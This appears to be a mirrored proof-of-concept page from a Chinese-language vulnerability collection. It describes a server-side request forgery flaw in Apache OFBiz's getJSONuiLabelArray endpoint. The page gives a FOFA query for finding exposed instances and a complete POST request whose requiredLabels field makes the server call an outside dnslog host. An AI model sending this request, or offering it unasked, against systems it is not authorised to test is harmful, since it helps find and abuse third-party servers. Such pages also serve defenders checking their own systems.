admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-28 09:10:33 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/Apache/ApachOFBiz/ApaceOFBizgetJSONuiLabelArray存在服务端请求伪造ssrf漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

2.1 KiB
Raw Blame History

Apace OFBiz getJSONuiLabelArray存在服务端请求伪造ssrf漏洞

一、漏洞简介

Apache OFBiz是一个非常著名的电子商务平台是一个非常著名的开源项目提供了创建基于最新J2EE/XML规范和技术标准构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。Apace OFBiz getJSONuiLabelArray存在服务端请求伪造ssrf漏洞。

二、影响版本

  • Apace OFBiz

三、资产测绘

  • fofaapp="Apache_OFBiz"
  • 特征

1704514365135-311b494b-09b2-413f-a8ec-93f13c5b2b53.png

四、漏洞复现

  1. 获取dnslog地址
v3f9em.dnslog.cn

1704514419059-66d8b314-0740-451a-b678-7e22e50ebc03.png

  1. 测试是否存在漏洞
POST /partymgr/control/getJSONuiLabelArray HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Content-Length: 79
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

requiredLabels={"https://v3f9em.dnslog.cn/api":["2aZ6okJyCI0H8XLAUeiv9Yu3wOK"]}

1704514461121-2657a5fc-cf77-4b35-8857-1069d87ccd00.png

1704514477535-9277697c-782c-4d32-b5d3-c94147c4b724.png

apache-OFBiz-getjsonuilabelarray-服务端请求伪造.yaml

更新: 2024-02-29 23:57:33
原文: https://www.yuque.com/xiaokp7/ocvun2/ciyvexuvwfhmzuq5